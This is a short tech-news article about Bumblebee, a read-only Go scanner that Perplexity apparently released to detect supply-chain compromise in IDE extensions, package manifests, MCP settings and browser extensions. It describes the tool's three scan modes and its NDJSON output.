Perplexity Dumps 'Bumblebee' on GitHub: Finally, a Way to Keep Your IDE From Hacking You

Developers have been sweating lately as supply-chain attacks shift from production servers to the tools we use every day. Attackers know that sneaking a malicious payload into a common VS Code extension or an npm package is infinitely easier than breaking into a hardened backend. To stop this, the folks at Perplexity built Bumblebee, a Go-based scanner that refuses to actually execute anything it inspects.

By sticking to a strict read-only policy, the tool avoids becoming the very hole it tries to patch. It ignores actual application logic and instead rips through lock files, manifests, and configuration files to spot suspicious patterns. It tracks everything from PyPI and npm dependencies to the Model Context Protocol settings and browser extensions that might be secretly phoning home.

The tool supports three intensity modes: Baseline for casual monitoring, Project for specific repo checks, and Deep for when the server room is already on fire. It spits out results in clean NDJSON, making it surprisingly easy for anyone to hook into their existing pipelines without paying a security firm a ransom.

Perplexity feeds the scanner with a constant stream of threat data harvested by its own internal AI search platform. It’s a classic case of using the machine to watch the machine, turning the endless chaos of open-source vulnerabilities into a manageable list of red flags. The irony of relying on an AI company to protect us from the very AI-driven dev environments they champion is probably not lost on anyone who remembers the last five years of tech 'progress'.

Source: Perplexity AI GitHub